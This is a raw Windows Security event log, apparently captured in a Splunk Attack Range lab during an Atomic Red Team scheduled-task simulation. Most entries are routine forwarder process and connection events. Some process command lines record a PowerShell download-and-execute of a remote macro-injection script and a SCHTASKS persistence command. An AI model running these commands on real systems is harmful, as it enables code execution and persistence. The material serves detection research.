Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13dc
New Process Name: C:\Windows\System32\cmd.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278948
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x16dc
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Exit Status: 0x1
04/19/2021 06:27:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278947
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887285
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1be8
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Exit Status: 0x1
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278953
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x1440
Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Exit Status: 0x0
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278952
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5184
Application Name: \device\harddiskvolume1\windows\system32\windowspowershell\v1.0\powershell.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53924
Destination Address: 185.199.111.133
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278951
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1440
New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {IEX (iwr \""https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"" -UseBasicParsing)
Invoke-MalDoc -macroFile \""C:\AtomicRedTeam\atomics\T1053.005\src\T1053.005-macrocode.txt\"" -officeProduct \""Word\"" -sub \""Scheduler\""}
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278950
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x370
Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Exit Status: 0x0
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4698
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=278949
Keywords=Audit Success
Message=A scheduled task was created.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Task Information:
Task Name: \AtomicTask
Task Content:
\AtomicTask
true
S-1-5-32-544
HighestAvailable
IgnoreNew
true
true
true
false
false
PT10M
PT1H
true
false
true
true
false
false
false
true
false
PT72H
7
calc.exe
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887287
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1277
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887286
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1277
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278955
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1970
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Exit Status: 0x1
04/19/2021 06:27:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278954
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1970
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:57 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278957
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1538
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Exit Status: 0x1
04/19/2021 06:27:57 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278956
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1538
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:58 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278959
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x19e0
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Exit Status: 0x1
04/19/2021 06:27:58 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278958
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:59 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278962
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0xc70
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Exit Status: 0x1
04/19/2021 06:27:59 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278961
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc70
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:59 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278960
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53925
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887289
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1278
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887288
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1278
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278964
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x764
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Exit Status: 0x1
04/19/2021 06:28:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278963
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x764
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:28:01 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278966
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0xd8
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Exit Status: 0x1
04/19/2021 06:28:01 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278965
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:28:04 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278967
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53926
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887291
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1279
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887290
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1279
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887293
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887292
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278968
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53927
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887295
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1280
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887294
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1280
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887305
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.24.8.4
Source Port: 0
Destination Address: 127.75.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 65789
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887304
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8FB87C
